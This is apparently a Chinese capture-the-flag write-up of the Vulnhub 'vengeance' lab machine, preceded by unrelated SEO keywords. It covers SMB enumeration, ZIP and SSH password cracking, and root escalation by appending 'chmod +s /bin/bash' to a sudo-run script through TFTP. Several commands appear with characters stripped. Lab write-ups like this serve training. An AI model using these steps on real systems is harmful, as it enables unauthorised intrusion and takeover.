外军网站建设,国内培训网站建设,wordpress 主菜单,什么叫网站外链前言
靶机#xff1a;digitalworld.local-vengeance#xff0c;IP地址为192.168.10.10
攻击#xff1a;kali#xff0c;IP地址为192.168.10.6
kali采用VMware虚拟机#xff0c;靶机选择使用VMware打开文件#xff0c;都选择桥接网络
这里官方给的有两种方式#xff…前言
靶机digitalworld.local-vengeanceIP地址为192.168.10.10
攻击kaliIP地址为192.168.10.6
kali采用VMware虚拟机靶机选择使用VMware打开文件都选择桥接网络
这里官方给的有两种方式一是直接使用virtualbox加载另一种是通过VMware直接加载也给出了iso镜像文件。 文章中涉及的靶机来源于vulnhub官网想要下载可自行访问官网下载或者通过网盘下载 https://pan.quark.cn/s/86cf8a398835 主机发现
使用arp-scan -l或netdiscover -r 192.168.10.1/24扫描
也可以使用nmap等工具进行 信息收集
使用nmap扫描端口
扫描tcp端口并保存于nmap-tcp
nmap -sT 192.168.10.10 --min-rate1000 -p- -oA nmap-tcp扫描常见的20个udp端口不过这里的端口明显处于open的很少
nmap -sU 192.168.10.10 --top-ports 20 -T4 -oA nmap-udp把前面扫描出的tcp端口进行处理只取端口号
grep open nmap-tcp.nmap | awk -F/ {print $1} | paste -sd ,
#这里就是包括可能开放的端口都不要因为是靶机可能过滤的话也会无法进一步扫描
ports80,180,110,113,139,143,443,445,993,995,22222对特定的端口号进行深入探测
nmap -sV -O -sC -sT 192.168.10.10 -p $ports -oA detail使用脚本检测有无漏洞
nmap --scriptvuln 192.168.10.10 -p $ports -oA vulnsmb探测
使用nmap的脚本进行测试不过脚本并没有启动成功
nmap --scriptsmb* 192.168.10.10使用enum4linux进行枚举发现内容 尝试使用smbclient连接最终以匿名身份连接到sarapublic分享时发现内容
smbclient //192.168.10.10/sarapublic$ -N然后把所以数据下载
smb: \ prompt
smb: \ recurse
smb: \ mget *这个似乎是工作目录查看essay.txt发现其中的信息包括产品以及两个人名qinyi、govindasamy 查看profile.txt文件发现一个人名giovanni 尝试解压gio.zip发现需要密码 尝试使用fcrackzip进行爆破发现字典rockyou.txt也没获取密码
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt gio.zip查看champagne目录看到一个网站的目录猜测这个可能是网站的备份文件之类的 网站探测
访问80端口的网站 结合前面nmap的扫描应该是一个wordpress的CMS这个界面估计是靶机需要绑定域名
点击一个链接发现是跳转到一个域名vengeance.goodtech.inc这个域名就是需要进行绑定的 在windows和linux中绑定域名需要编辑hosts文件只是文件的位置不同
linux 在 /etc/hosts文件
windos在 C:\Windows\System32\Drivers\etc\hosts文件绑定后即可正常访问了 使用whatweb探测网站信息
whatweb http://192.168.10.10使用浏览器的插件wappalyzer查看网站相关使用 使用针对wordpress这个CMS的专门工具wpscan
wpscan --url http://vengeance.goodtech.inc -e u获取到wordpress的版本信息5.6.1 枚举到三个用户qinyi、sara、qiu 尝试进行爆破密码但是这里未找到接口大概率是目录名称更换了所以采用目录爆破一下
使用gobuster进行爆破也是没有好的数据
gobuster dir -u http://192.168.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.bak,.txt,s,.,.html -b 403-404仔细的去看看这个网站发现这个网站是用户qinyi的博客记录了她的一些事件 访问其中一个文章发现一个需要密码的界面 唉这个网站中还有一些其他文章可以去自己看看评论也有。爱情啊
但是到这里又断了
压缩包破解
之前在smb获取的信息应该有大用才对回去继续测试
尝试从80端口的网站使用cewl获取单词但是获取到的东西并不能破解。
那么既然压缩包gio.zip中有一些其他的txt文件那么是否这里面的单词有可能会有密码
grep -oE \w blurb.txt| sort | uniq pass.txt
grep -oE \w eaurouge | sort | uniq pass.txt
grep -oE \w eaurouge.txt| sort | uniq pass.txt
grep -oE \w essay.txt| sort | uniq pass.txt
grep -oE \w profile.txt| sort | uniq pass.txt然后使用fcrackzip进行破解
fcrackzip -u -D -p pass.txt gio.zip获取到密码nanotechnological 到了这里我变得很敏感了查看文件pass_reminder.txt发现字段 查看pptx文件五张幻灯片有很多文字 我现在把ppt中的文字都放在一个文件中并通过grep等命令分割单词然后作为字典 这里做成的字典可以作为网站的密码破解或者是对ssh登录进行爆破
ssh爆破
之前使用wpscan或者smb枚举时有些用户的把这些用户放在一个文件中
hydra 192.168.10.10 -L user.txt -P pass.txt ssh -s 22222但是爆破后并没有反应突然想到解压后的一个文件名pass_reminder密码提醒 文件内容是密码构成
name ----名称
corner ----拐角角
circuit ----电路再次查看ppt毕竟图片没有内容了这个ppt的作者名称Giovanni Berlusconi 另一种ppt说的是corner就是角 搜索一下这个图片的出处因为这里说了最喜欢的弯道但是没给出具体名称 ok知道了就构造密码
name ---Giovanni Berlusconi
corner ---130R
circuit ---Suzuka编写一个bash脚本即可
for name in giovanni berlusconi Giovanni Berlusconi Giovanni Berlusconi; doprintf %s_130R_Suzuka\n $name
done pass.txt使用hydra进行爆破
hydra 192.168.10.10 -L user.txt -P pass.txt ssh -s 22222以这个账户密码giovanni_130R_Suzuka连接ssh
ssh qinyi192.168.10.10 -p 22222靶机内信息收集
登录qinyi的账户后查看当前目录下的提示 这里看到有sara、patrick两个人名并且可能有些东西修改了有些还没来得及
查看有哪些用户
ls -alh /home
cat /etc/passwd | grep /bin/bash收集内核版本和系统版本
uname -a/-r
cat /etc/issue
cat /etc/*release
lsb_release查看其他用户具有写权限的文件发现并没有
find / -type f -perm /ow 2/dev/null | grep -v /sys | grep -v /proc获取以root执行的进程
ps aux | grep root查看连接状态等信息没什么值得关注
ip add
ss -antlp
netstat -antlp查看定时任务
crontab -l
cat /etc/crontab
atq上传pspy64然后进行测试看有无隐藏执行的进程
在kali中执行scp上传到靶机
scp -P 22222 ./pspy64 qinyi192.168.10.10:/tmp不过执行后还是没有东西
再通过kali的scp上传linpeas.sh
scp -P 22222 ./linpeas.sh qinyi192.168.10.10:/tmp东西太多大致都差不多
使用find寻找具有SUID权限的文件
find / -perm -4000 -print 2/dev/null使用sudo -l查看 虽然nginx可以重启但是前面寻找可以编辑的文件时nginx的配置文件并不能修改那么就无作用
另一个是在/home/sara目录也就是sara用户的家目录下
查看文件夹没有权限去查看或执行 提权
我这里测试很久并没有找到方式内核也测试过了
网上看了一下wp啧我真的蠢死
这里就是端口的问题了但是我只看了tcp端口udp端口没看导致错过关键信息
netstat -antulp
ss -antulp查看的网络连接状态其实tcp端口基本上都是nmap扫描出的
对于udp即使扫描出了我也没怎么关注所以这是错误的
对扫描的结果进行处理保留端口号
ss -antulp | grep udp | awk -F : {print $2} | awk -F {print $1}| uniq | paste -sd ,然后在kali中再次对这些端口进行扫描
nmap -sV -sU 192.168.10.10 -p53,68,69,137,138这几个里面可能只有tftp是有用的因为这个就是和ftp是一样的直接连接测试是否被过滤或者说被拦截
tftp 192.168.10.10 69可以连接成功但是并不知道路径连接后也不能使用pwd
并且put上传文件后在靶机使用find也无法找到上传的文件的去向
使用lsof测试tftp
lsof | tftp 这里知道是通过apt安装的tftp那么就可以搜索apt安装tftp的默认配置文件等情况 查看这个配置文件确定靶机的tftp的根目录是什么 哈哈哈哈哈哈哈哈哈与sudo的一个文件一样并且用户名是root。那么直接尝试进行get下载后查看这个文件 直接在文件后面添加代码以最简单的
chmod s /bin/bash再次把这个文件上传不过名称一定要一样不要修改直接put 可以看到/bin/bash已经有了SUID权限
直接提权
/bin/bash -p总结
这个靶机其实主要就是密码的猜测
该靶机值得反思以下几点
对于网站并非一定是突破口smb匿名登录获取分享中的数据主要就是围绕一个压缩包其中的txt文件都是作为其密码的根据这个我没想到网站我想到了但是这个是真的没想到所以思维要广对于压缩包的破解后获取到的文件一定有用的所以不要放弃这里是给出了提示所以排列组合少了很多若没有提示呢啧靶机内的信息收集一定要全面我这里忽略了udp端口在靶机的监听状态导致漏掉了tftp提权这里还是sudo主要就是发现tftp以及tftp的根目录不然这个靶机也是无法提权的
其实到最后我好奇的还是网站的哪个需要密码的东西到底是什么我后面会去观看的
最终还是通过数据库找到了密码没找到
原来这是感情经历怪不得密码封印
